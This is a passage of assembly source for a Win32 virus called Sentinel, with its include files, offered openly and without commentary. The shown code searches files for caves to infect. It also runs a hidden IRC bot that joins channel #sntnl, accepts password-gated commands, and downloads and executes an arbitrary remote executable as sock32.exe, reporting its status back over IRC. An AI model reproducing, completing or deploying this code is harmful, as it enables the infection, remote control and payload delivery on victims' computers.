; Not equal? Jump to reset_cavity_loop inc edx ; Increase number of bytes found in ; cave cmp edx,ebp ; Found a cave large enough? jne find_cave_loop ; Not equal? Jump to find_cave_loop sub esi,ebp ; ESI = pointer to cave jmp exit_cave no_cave_found: xor esi, esi exit_cave: mov [esp + 4],esi popad ret ;----------------------------------------------------------------------------- CAVITYSEARCH endp names dd 30d name1 db 'pion',0 name2 db 'sarge',0 name3 db 'blink',0 name4 db 'midge',0 name5 db 'xaero',0 name6 db 'void',0 name7 db 'vivid',0 name8 db 'xeon',0 name9 db 'n0bs',0 name10 db 'helios',0 name11 db 'phobos',0 name12 db 'flux',0 name13 db 'hypno',0 name14 db 'bond',0 name15 db 'chaos',0 name16 db 'blup',0 name17 db 'sntnl',0 name18 db 'fire',0 name19 db 'water',0 name20 db 'earth',0 name21 db 'heart',0 name22 db 'stone',0 name23 db 'light',0 name24 db 'love',0 name25 db 'silver',0 name26 db 'surfer',0 name27 db 'panic',0 name28 db 'm00dy',0 name29 db 'texas',0 name30 db 'snow',0 name31 db 'beta',0 servers dd 04d server1 db "",0 server2 db "",0 server3 db "",0 server4 db "",0 server5 db "",0 port1 dd 7000d port2 dd 6660d port3 dd 6660d port4 dd 6661d port5 dd 6667d GET_ITEM_FROM_LIST proc ; IN: eax = total number of items ; esi = offset of first item ; OUT: esi = pntr to start of item ; ecx = size of item ; eax = random number GetItemFromList: push edi push esi call GET_RANDOM_NUMBER_WITHIN mov ecx, eax pop esi push eax or ecx, ecx jz GetSizeOfItem GetPositionOfItem: push ecx call GET_STRING_SIZE add esi, ecx inc esi pop ecx loop GetPositionOfItem GetSizeOfItem: call GET_STRING_SIZE pop eax pop edi ret GET_ITEM_FROM_LIST endp IRC_LAUNCH proc IRCLaunch: cmp [ebp + ircstatus], 00h je CreateIRCThread ret CreateIRCThread: lea eax, [ebp + ircthreadid] push eax push 00h push 01h lea eax, [ebp + IRC_THREAD] push eax push 00h push 00h lea eax, [ebp + ACreateThread] call GETAPI mov [ebp + ircstatus], 01h ret IRC_LAUNCH endp IRC_THREAD proc handle: dword IrcThreadEntryPoint: pushad call GetIrcDelta GetIrcDelta: pop ebp sub ebp, offset GetIrcDelta GetWSock32Base: call FIND_GETPROCADDRESS_API_ADDRESS call FIND_WSOCK32_BASE_ADDRESS LoadWinInetDll: lea eax, [ebp + wininet] push eax lea eax, [ebp + ALoadLibrary] call GETAPI or eax, eax jz UserIsOffline FindConnectionApiAddress: lea ebx, [ebp + AInternetGetConnectedState] push ebx push eax call [ebp + AGetProcAddressA] or eax, eax jz UserIsOffline CheckConnection: push 00h lea ebx, [ebp + buffer] push ebx call eax or eax, eax jnz UserIsOnline UserIsOffline: push 10000h lea eax, [ebp + ASleep] call GETAPI jmp LoadWinInetDll UserIsOnline: lea eax, [ebp + mywsadata] push eax push 101h lea eax, [ebp + AWSAStartup] call GETWAPI OpenSocket: push 00h push SOCK_STREAM push AF_INET lea eax, [ebp + Asocket] call GETWAPI mov [ebp + socketh], eax GetSocketValues: mov [ebp + mysocket.sin_family], AF_INET mov eax, [ebp + servers] lea esi, [ebp + server1] call GET_ITEM_FROM_LIST push esi push ecx GetPort: lea esi, [ebp + port1] mov ecx, 04 mul ecx add esi, eax mov edx, dword ptr [esi] push edx lea eax, [ebp + Ahtons] call GETWAPI mov [ebp + mysocket.sin_port], ax pop ecx lea eax, [ebp + Ainet_addr] call GETWAPI mov [ebp + mysocket.sin_addr], eax Connect: push 10h lea eax, [ebp + mysocket] push eax push [ebp + socketh] lea eax, [ebp + Aconnect] call GETWAPI test eax, eax jnz Connect LogonToIrcServer: call LOGON DoTheLoop: call IRC_RECEIVE or eax, eax jz CloseSocket jmp DoTheLoop CloseSocket: push [ebp + socketh] lea eax, [ebp + Aclosesocket] call GETWAPI WSACleanUp: lea eax, [ebp + AWSACleanup] call GETWAPI ExitThread: popad ret IRC_THREAD endp LOGON proc near call IRC_RECEIVE SendNick: lea edi, [ebp + offset buffer] lea esi, [ebp + offset nick] mov ecx, 05h rep movsb lea esi, [ebp + name1] mov eax, [ebp + names] call GET_ITEM_FROM_LIST rep movsb mov ebx, 10d call GET_RANDOM_NUMBER_WITHIN add eax, 48d mov byte ptr [edi], al inc edi mov ebx, 10d call GET_RANDOM_NUMBER_WITHIN add eax, 48d mov byte ptr [edi], al inc edi lea esi, [ebp + crlf] mov ecx, 03h rep movsb lea esi, [ebp + buffer] call GET_STRING_SIZE call IRC_SEND call IRC_RECEIVE SendUser: lea edi, [ebp + buffer] lea esi, [ebp + user1] mov ecx, 05d rep movsb call CREATE_RANDOM_NAME lea esi, [ebp + user2] mov ecx, 18d rep movsb lea esi, [ebp + buffer] call GET_STRING_SIZE call IRC_SEND call IRC_RECEIVE call IRC_RECEIVE SendJoin: lea esi, [ebp + join] mov ecx, 13d call IRC_SEND PostVersionMessage: call .PostVersion LogonDone: ret LOGON endp IRC_RECEIVE proc push 00h push 400h lea eax, [ebp + buffer] push eax push [ebp + socketh] lea eax, [ebp + ARecv] call GETWAPI mov [ebp + nrbytes], eax call IRC_SCANBUFFER ret IRC_RECEIVE endp IRC_SEND proc ; esi = snd buffer ; ecx = size to send push 00h push ecx push esi push [ebp + socketh] lea eax, [ebp + ASend] call GETWAPI ret IRC_SEND endp .PostVersion: lea edi, [ebp + buffer] lea esi, [ebp + post] mov ecx, 16d rep movsb lea esi, [ebp + post_vers] mov ecx, 5d rep movsb lea esi, [ebp + version] mov ecx, 4d rep movsb lea esi, [ebp + crlf] mov ecx, 03d rep movsb lea esi, [ebp + buffer] call GET_STRING_SIZE call IRC_SEND ret .RespondPing: lea edi, [ebp + buffer] lea esi, [ebp + pong] mov ecx, 04h rep movsb mov ecx, [ebp + nrbytes] lea esi, [ebp + buffer] call IRC_SEND .RespondPing_End: ret IRC_SCANBUFFER proc ; IN esi: buffer start ; ecx: buffer size ScanDaBuffer: mov ecx, [ebp + nrbytes] lea esi, [ebp + buffer] .PingPongMessage: cmp dword ptr [esi], 'GNIP' jne GetReplyNick call .RespondPing jmp EndLoop GetReplyNick: jecxz EndLoop inc esi dec ecx cmp byte ptr [esi], '!' je ExtractReplyNick cmp byte ptr [esi], ':' je EndLoop jmp GetReplyNick ExtractReplyNick: push esi push ecx mov ecx, esi lea esi, [ebp + buffer] sub ecx, esi dec ecx inc esi lea edi, [ebp + replynick] rep movsb mov byte ptr [edi], 00h pop ecx pop esi ScanLoop: jecxz EndLoop cmp dword ptr [esi], 'VIRP' je SearchTextStart inc esi dec ecx jmp ScanLoop SearchTextStart: jecxz EndLoop cmp byte ptr [esi], ':' je .CommandMessage inc esi dec ecx jmp SearchTextStart .CommandMessage: inc esi dec ecx cmp dword ptr [esi], 's54p' jne EndLoop GetText: add esi, 5 sub ecx, 5 cmp byte ptr [esi], '/' jne EndLoop CheckIncomingCommandMessage: inc esi dec ecx cmp dword ptr [esi], 'kc1n' je CreateRandomNick cmp dword ptr [esi], 't1uq' je QuitIrc cmp dword ptr [esi], 'c3xe' je LaunchInstaller cmp dword ptr [esi], 't4ts' je InstallerStatus call IRC_SEND jmp EndLoop CreateRandomNick: lea edi, [ebp + mynick] call CREATE_RANDOM_NAME mov byte ptr [edi], 00h lea edi, [ebp + buffer] mov dword ptr [edi], 'KCIN' add edi, 04h mov byte ptr [edi], ' ' inc edi lea esi, [ebp + mynick] call GET_STRING_SIZE rep movsb lea esi, [ebp + crlf] mov ecx, 03h rep movsb lea esi, [ebp + buffer] call GET_STRING_SIZE call IRC_SEND jmp EndLoop QuitIrc: lea esi, [ebp + quit] mov ecx, 06h call IRC_SEND xor eax, eax jmp EndLoop LaunchInstaller: call INSTALLER_LAUNCH jmp EndLoop InstallerStatus: call INSTALLER_STATUS EndLoop: ret IRC_SCANBUFFER endp version db "0101",0 post db "PRIVMSG #sntnl :",0 post_vers db "vers ",0 mynick db 5h dup(0) replynick db 5h dup(0) nrbytes dd 0 ircstatus dd 0 ircthreadid dd 0 wsock32 db "WSOCK32.dll",0 wininet db "WININET.dll",0 ASend db "send",0 ARecv db "recv",0 AWSAGetLastError db "WSAGetLastError",0 AWSAGetLastErrorA dd 0 AInternetGetConnectedState db "InternetGetConnectedState",0 ACreateThread db "CreateThread",0 AWSAStartup db "WSAStartup",0 AWSACleanup db "WSACleanup",0 Asocket db "socket",0 Aconnect db "connect",0 Aclosesocket db "closesocket",0 Ahtons db "htons",0 Ainet_addr db "inet_addr",0 AGetTickCount db "GetTickCount",0 AGetLastError db "GetLastError",0 ASleep db "Sleep",0 random_number dd 01234567h ipaddress db "",0 ; if the bot does not appear online in #sentinel, try using a different ; server ip-address. user1 db "USER ",0 user2 db " bb cc sentinel",0dh,0ah nick db "NICK ",0 pong db "PONG",0 join db "JOIN #sntnl",0dh,0ah quit db "QUIT",0dh,0ah crlf db 0dh, 0ah,0 dots db ' :',0 socketh dd 0 buffer db 400h dup(0) mywsadata WSADATA <> mysocket SOCKADDR <> CREATE_RANDOM_NAME proc ; IN: edi = place to put 5 rnd chars call GetRandomChar call GetRandomChar call GetRandomChar call GetRandomChar call GetRandomChar ret GetRandomChar: mov eax, 26d call GET_RANDOM_NUMBER_WITHIN add eax, 97d mov byte ptr [edi], al inc edi ret CREATE_RANDOM_NAME endp GET_STRING_SIZE proc GetStringSize: xor ecx, ecx SearchEndOfString: cmp byte ptr [esi + ecx], 0h je StringSizeFound inc ecx jmp SearchEndOfString StringSizeFound: ret GET_STRING_SIZE endp INSTALLER_LAUNCH proc LaunchTheInstaller: add esi, 05h sub ecx, 05h GetServerValue: cmp byte ptr [esi], '[' jne ExitInstallerLaunch inc esi FoundServerValueStart: mov edi, esi xor edx, edx GetServerLoop: cmp byte ptr [esi], ']' je StoreServerValue inc esi inc edx dec ecx cmp ecx, 00h je ExitInstallerLaunch jmp GetServerLoop StoreServerValue: mov esi, edi push ecx lea edi, [ebp + installer_server] mov ecx, edx rep movsb pop ecx GetGetCommand: cmp byte ptr [esi], '[' je FilterGetCommand inc esi dec ecx cmp ecx, 00h je ExitInstallerLaunch jmp GetGetCommand FilterGetCommand: inc esi mov edi, esi xor edx, edx GetCommandLoop: cmp byte ptr [esi], ']' je SaveGetCommand inc esi inc edx dec ecx cmp ecx, 00h je ExitInstallerLaunch jmp GetCommandLoop SaveGetCommand: mov [ebp + installer_getsize], edx mov esi, edi mov ecx, edx lea edi, [ebp + installer_get] rep movsb InstallerGo: mov [ebp + installer_launchstatus], 00h lea eax, [ebp + installerthreadid] push eax push 00h push 1234567h lea eax, [ebp + INSTALLER_THREAD] push eax push 10000h push 00h lea eax, [ebp + ACreateThread] call GETAPI ExitInstallerLaunch: ret INSTALLER_LAUNCH endp INSTALLER_RECEIVE proc SaveStack: pushad ReceiveData: push edi mov eax, [ebp + nrbytes2] mov esi, dword ptr [ebp + dmHnd] add esi, eax push 00h push edi push esi push [ebp + isocketh] lea eax, [ebp + ARecv] call GETWAPI add [ebp + nrbytes2], eax pop edi mov ecx, eax inc ecx jnz InstallerProceed call [ebp + AWSAGetLastErrorA] cmp eax,2733h je ReceiveData InstallerProceed: popad ret INSTALLER_RECEIVE endp INSTALLER_STATUS proc CheckInstallerStatus: cmp [ebp + installer_launchstatus], 00h je StatusWaiting cmp [ebp + installer_launchstatus], 01h je StatusInstalling cmp [ebp + installer_launchstatus], 02h je StatusDone cmp [ebp + installer_launchstatus], 03h je StatusConnectionError cmp [ebp + installer_launchstatus], 04h je StatusSizeError jmp ExitInstallerStatus StatusWaiting: push 00h push 28d lea eax, [ebp + installer_stat00] push eax push [ebp + socketh] lea eax, [ebp + ASend] call GETWAPI jmp ExitInstallerStatus StatusInstalling: push 00h push 31d lea eax, [ebp + installer_stat01] push eax push [ebp + socketh] lea eax, [ebp + ASend] call GETWAPI jmp ExitInstallerStatus StatusDone: push 00h push 25d lea eax, [ebp + installer_stat02] push eax push [ebp + socketh] lea eax, [ebp + ASend] call GETWAPI jmp ExitInstallerStatus StatusConnectionError: push 00h push 38d lea eax, [ebp + installer_stat03] push eax push [ebp + socketh] lea eax, [ebp + ASend] call GETWAPI jmp ExitInstallerStatus StatusSizeError: push 00h push 31d lea eax, [ebp + installer_stat04] push eax push [ebp + socketh] lea eax, [ebp + ASend] call GETWAPI ExitInstallerStatus: ret INSTALLER_STATUS endp INSTALLER_THREAD proc handle: dword GetInstallerDelta: pushad call InstallerDelta InstallerDelta: pop ebp sub ebp, offset InstallerDelta AllocateExeMem: push 1000000h push GMEM_FIXED lea eax, [ebp + AGlobalAlloc] call GETAPI mov [ebp + dmHnd], eax or eax, eax jz ExitInstaller InstallerWsaStartup: lea eax, [ebp + mywsadata] push eax push 101h lea eax, [ebp + AWSAStartup] call GETWAPI InstallerOpenSocket: push 00h push 01h push 02h lea eax, [ebp + Asocket] call GETWAPI mov [ebp + isocketh], eax InstallerGetSocketValues: mov [ebp + mysocket2.sin_family], 02h push 80 lea eax, [ebp + Ahtons] call GETWAPI mov [ebp + mysocket2.sin_port], ax lea eax, [ebp + installer_server] push eax lea eax, [ebp + Ainet_addr] call GETWAPI mov [ebp + mysocket2.sin_addr], eax xor ecx, ecx InstallerConnect: cmp ecx, 03h je InstallerConnectionError push ecx push 10h lea eax, [ebp + mysocket2] push eax push [ebp + isocketh] lea eax, [ebp + Aconnect] call GETWAPI pop ecx or eax, eax jz InstallerSendGetCommand inc ecx jmp InstallerConnect InstallerConnectionError: mov [ebp + installer_launchstatus], 03h jmp ExitInstaller InstallerSendGetCommand: push 00h push [ebp + installer_getsize] lea eax, [ebp + installer_get] push eax push [ebp + isocketh] lea eax, [ebp + ASend] call GETWAPI push 00h push 02h lea eax, [ebp + crlf] push eax push [ebp + isocketh] lea eax, [ebp + ASend] call GETWAPI push 00h push 02h lea eax, [ebp + crlf] push eax push [ebp + isocketh] lea eax, [ebp + ASend] call GETWAPI mov [ebp + installer_launchstatus], 01h mov [ebp + nrbytes2], 00h mov ecx, 1000000h ReceiveLoop: cmp ecx, 400h jna LastPart sub ecx, 400h mov edi, 400h call INSTALLER_RECEIVE jmp ReceiveLoop LastPart: mov edi, ecx call INSTALLER_RECEIVE SearchMz: xor ecx, ecx mov edi, dword ptr [ebp + dmHnd] MzLoop: cmp word ptr [edi], 'ZM' je FoundExeMark inc edi inc ecx cmp ecx, 200h ja SearchZm jmp MzLoop SearchZm: xor ecx, ecx mov edi, dword ptr [ebp + dmHnd] ZmLoop: cmp word ptr [edi], 'MZ' je FoundExeMark inc edi inc ecx cmp ecx, 200h ja InstallerCloseSocket jmp ZmLoop FoundExeMark: mov [ebp + skip], ecx ZeroWindirString: mov ecx, 100h xor eax, eax lea edi, [ebp + windir] rep stosb InstallerGetSetWindowsDirectory: call GET_WINDIR call SET_WINDIR push 00h push 20h push 02h push 00h push 01h push 80000000h or 40000000h lea eax, [ebp + commandline] push eax lea eax, [ebp + ACreateFile] call GETAPI mov [ebp + ifilehandle], eax push 02h push 00h push 00h push eax lea eax, [ebp + ASetFilePointer] call GETAPI mov edi, dword ptr [ebp + dmHnd] add edi, [ebp + skip] mov ebx, [ebp + nrbytes2] sub ebx, [ebp + skip] push 00h lea edx, [ebp + bytesread] push edx push ebx push edi push [ebp + ifilehandle] lea eax, [ebp + AWriteFile] call GETAPI InstallerGetRealSize: lea ebx, [ebp + irealsize] push ebx push [ebp + ifilehandle] lea eax, [ebp + AGetFileSize] call GETAPI mov [ebp + irealsize], eax InstallerCloseFile: push [ebp + ifilehandle] lea eax, [ebp + ACloseHandle] call GETAPI GetFileSize: mov edi, dword ptr [ebp + dmHnd] xor ecx, ecx InstallerFileSizeLoop: cmp dword ptr [edi], ':htg' je InstallerFoundSize inc ecx inc edi cmp ecx, 200h je InstallerCloseSocket jmp InstallerFileSizeLoop InstallerFoundSize: xor ecx, ecx add edi, 05h mov [ebp + sizestart], edi ExtractFileSizeLoop: cmp word ptr [edi], 0a0dh je FoundEndOfSizeString inc edi inc ecx cmp ecx, 10h je InstallerCloseSocket jmp ExtractFileSizeLoop FoundEndOfSizeString: cld mov [ebp + sizesize], ecx mov [ebp + ifilesize], 00h mov ebx, 01h mov esi, [ebp + sizestart] add esi, ecx sub esi, 01h Convert2Int: xor eax, eax lodsb sub eax,'0' mul ebx add [ebp + ifilesize], eax add edx, eax dec esi dec esi dec ecx cmp ecx, 00h je InstallerCheckFileSize push ecx push esi mov ecx, 10d mov eax, ebx mul ecx mov ebx, eax pop esi pop ecx jmp Convert2Int InstallerCheckFileSize: mov esi, [ebp + ifilesize] mov edi, [ebp + irealsize] cmp esi, edi je ExecuteFile mov [ebp + installer_launchstatus], 04h jmp InstallerCloseSocket ExecuteFile: lea eax, [ebp + lpProcessInformation] push eax lea eax, [ebp + lpStartupInfo] push eax push 00h push 00h push CREATE_DEFAULT_ERROR_MODE push FALSE lea eax, [ebp + lpThreadAttributes] push eax lea eax, [ebp + lpProcessAttributes] push eax lea eax, [ebp + commandline] push eax push 00h lea eax, [ebp + ACreateProcess] call GETAPI mov [ebp + installer_launchstatus], 02h InstallerCloseSocket: push [ebp + isocketh] lea eax, [ebp + Aclosesocket] call GETWAPI lea eax, [ebp + AWSACleanup] call GETWAPI ExitInstaller: popad ret INSTALLER_THREAD endp FALSE = 0 TRUE = 1 lpProcessInformation PROCESS_INFORMATION <> lpStartupInfo STARTUPINFO <> lpThreadAttributes SECURITY_ATTRIBUTES <> lpProcessAttributes SECURITY_ATTRIBUTES <> mysocket2 SOCKADDR <> AWriteFile db "WriteFile",0 ACreateProcess db "CreateProcessA",0 AGlobalAlloc db "GlobalAlloc",0 commandline db "sock32.exe",0 windir db 100h dup(0) skip dd 0 sizestart dd 0 sizesize dd 0 bytesread dd 0 nrbytes2 dd 0 dmHnd dd 0 ifilehandle dd 0 ifilesize dd 0 irealsize dd 0 isocketh dd 0 installerthreadid dd 0 installer_server db 20h dup(0) installer_get db 100h dup(0) installer_serversize dd 0 installer_getsize dd 0 installer_launchstatus dd 0 installer_stat00 db "PRIVMSG #sntnl :Waiting...",0dh,0ah installer_stat01 db "PRIVMSG #sntnl :Installing...",0dh,0ah installer_stat02 db "PRIVMSG #sntnl :Done...",0dh,0ah installer_stat03 db "PRIVMSG #sntnl :Unable to connect...",0dh,0ah installer_stat04 db "PRIVMSG #sntnl :Size error...",0dh,0ah GET_WINDIR proc GetWindowsDir: push 128h ; size of dirstring lea eax, [ebp + windir] ; save it here push eax lea eax, [ebp + AGetWindowsDirectory] ; get windowsdir call GETAPI ret GET_WINDIR endp SET_WINDIR proc SetWindowsDir: lea eax, [ebp + windir] ; change to sysdir push eax lea eax, [ebp + ASetCurrentDirectory] call GETAPI ret SET_WINDIR endp ;========================================================================; Leap: .code OriginalHost: pop ebx push 00h call ExitProcess end FirstCopy end ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SENTINEL.ASM]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MYINC.INC]ÄÄÄ GMEM_FIXED = 0000h LPVOID typedef DWORD ;long ptr to buffer BOOL typedef DWORD ;boolean variable HANDLE typedef DWORD ;unspecified handle LPSTR typedef DWORD ;long ptr to string LPBYTE typedef DWORD ;long ptr to byte ACHAR typedef BYTE ;ansi character CHAR textequ <ACHAR> ;ansi char type CHAR_ equ 1 ;ansi char size CREATE_DEFAULT_ERROR_MODE equ 04000000h SECURITY_ATTRIBUTES_ equ 4+4+4 SECURITY_ATTRIBUTES struct sa_nLength DWORD SECURITY_ATTRIBUTES_ ;structure size sa_lpSecurityDescriptor LPVOID 0 ;security descriptor sa_bInheritHandle BOOL 0 ;handle inheritance flag SECURITY_ATTRIBUTES ends PROCESS_INFORMATION struct pi_hProcess HANDLE 0 ;process handle pi_hThread HANDLE 0 ;thread handle pi_dwProcessId DWORD 0 ;process id pi_dwThreadId DWORD 0 ;thread id PROCESS_INFORMATION ends PROCESS_INFORMATION_ equ 4+4+4+4 STARTUPINFO struct si_cb DWORD 0 ;structure size si_lpReserved LPSTR 0 ;(reserved) si_lpDesktop LPSTR 0 ;desktop name sl_lpTitle LPSTR 0 ;console window title si_dwX DWORD 0 ;window origin (column) si_dwY DWORD 0 ;window origin (row) si_dwXSize DWORD 0 ;window width si_dwYSize DWORD 0 ;window height si_dwXCountChars DWORD 0 ;screen buffer width si_dwYCountChars DWORD 0 ;screen buffer height si_dwFillAttribute DWORD 0 ;console window initialization si_dwFlags DWORD 0 ;structure member flags si_wShowWindow WORD 0 ;ShowWindow() parameter si_cbReserved2 WORD 0 ;(reserved) si_lpReserved2 LPBYTE 0 ;(reserved) si_hStdInput HANDLE 0 ;standard input handle si_hStdOutput HANDLE 0 ;standard output handle si_hStdError HANDLE 0 ;standard error handle STARTUPINFO ends STARTUPINFO_ equ 4+4+4+4+4+4+4+4+4+4+4+4+2+2+4+4+4+4 WIN32_FIND_DATA_ equ 4+8+8+8+4+4+4+4+(260*CHAR_)+(14*CHAR_) WIN32_FIND_DATA struct fd_dwFileAttributes DWORD 0 ;file attributes fd_ftCreationTime DWORD 0, 0 ;time of file creation fd_ftLastAccessTime DWORD 0, 0 ;time of last file access fd_ftLastWriteTime DWORD 0, 0 ;time of last write access fd_nFileSizeHigh DWORD 0 ;high-order word of file size fd_nFileSizeLow DWORD 0 ;low-order word of file size fd_dwReserved0 DWORD 0 ;(reserved) fd_dwReserved1 DWORD 0 ;(reserved) fd_cFileName CHAR 260 dup(0) ;matching file name fd_cAlternateFileName CHAR 14 dup(0) ;8.3 alias name WIN32_FIND_DATA ends ; SEH struct m_pSEH DWORD 0 m_pExcFunction DWORD 0 SEH ends ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MYINC.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WSOCKS.INC]ÄÄÄ ; ; WSocks.inc: include file for windows sockets . ; Designed for TASM5 and Win32. ; ; (C) 1999 Bumblebee. ; ; This file contains basic structures and stuff to work ; with windows sockets. ; ; Descriptions of the API: ; arguments in order of PUSH ;) ; only for debug extrn WSAGetLastError:PROC ; starts the use of winsock dll ; addr WSADATA, version requested ; returns: 0 ok extrn WSAStartup:PROC ; terminates the use of winsock dll ; returns: SOCK_ERR on error extrn WSACleanup:PROC ; opens a new socket ; protocol (PCL_NONE), type (SOCK_??), addr format (AF_??) ; returns: socket id or SOCKET_ERR (socket is dw) extrn socket:PROC ; closes a socket ; socket descriptor ; extrn closesocket:PROC ; sends data (this socks are a shit... Unix uses simple write) ; flags (1 OOB data or 0 normal ) , length, addr of buffer, socket ; returns: caracters sent or SOCKET_ERR on error extrn send:PROC ; reveives data (this socks are a shit... Unix uses simple read) ; flags (use 0), length, addr of buffer, socket ; returns: caracters sent or SOCKET_ERR on error extrn recv:PROC ; connects to a server ; sizeof struct SOCKADDR, struct SOCKADDR, socket ; returns: SOCKET_ERR on error extrn connect:PROC ; gets the name of the current host ; length of the buffer for name, addr of buffer for name ; return: SOCKET_ERR on error extrn gethostname:PROC ; gets strcut hostent ; addr of name ; returns: ponter to the struct or 0 on error extrn gethostbyname:PROC ; converts a zstring like "xxx.xxx.xx...." to netw byte order ; zstring ptr to change to dotted addr format ; returns: in_addr (dd) extrn inet_addr:PROC ; dw to convert into netw byte order (usually the port) ; returns: the value in network byte order (dw) extrn htons:PROC ; Structs :o ; sockaddr struct for connection ; modified (for better use) ; if you want the original look for it into a winsock.h SOCKADDR struct sin_family dw 0 ; ex. AF_INET sin_port dw 0 ; use htons for this sin_addr dd 0 ; here goes server node (from inet_addr) sin_zero db 8 dup(0) SOCKADDR ends ; for WSAStartup diagnose WSADATA struct mVersion dw 0 mHighVersion dw 0 szDescription db 257 dup(0) szSystemStatus db 129 dup(0) iMaxSockets dw 0 iMaxUpdDg dw 0 lpVendorInfo dd 0 WSADATA ends ; Some nice equs ; what version of winsock do you need? (usually 1.1) VERSION1_0 equ 0100h VERSION1_1 equ 0101h VERSION2_0 equ 0200h AF_UNIX equ 1 ; local host AF_INET equ 2 ; internet (most used) AF_IMPLINK equ 3 ; arpanet AF_NETBIOS equ 17 ; NetBios style addresses ; types of sockets SOCK_STREAM equ 1 ; stream (connection oriented; telnet like) SOCK_DGRAM equ 2 ; datagram (packets, packets, packets) ; protocol PCL_NONE equ 0 ; none (define the protocol not needed) SOCKET_ERR equ -1 ; standard winsock error HOSTENT_IP equ 10h ; where is the IP into the hostent struct ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WSOCKS.INC]ÄÄÄ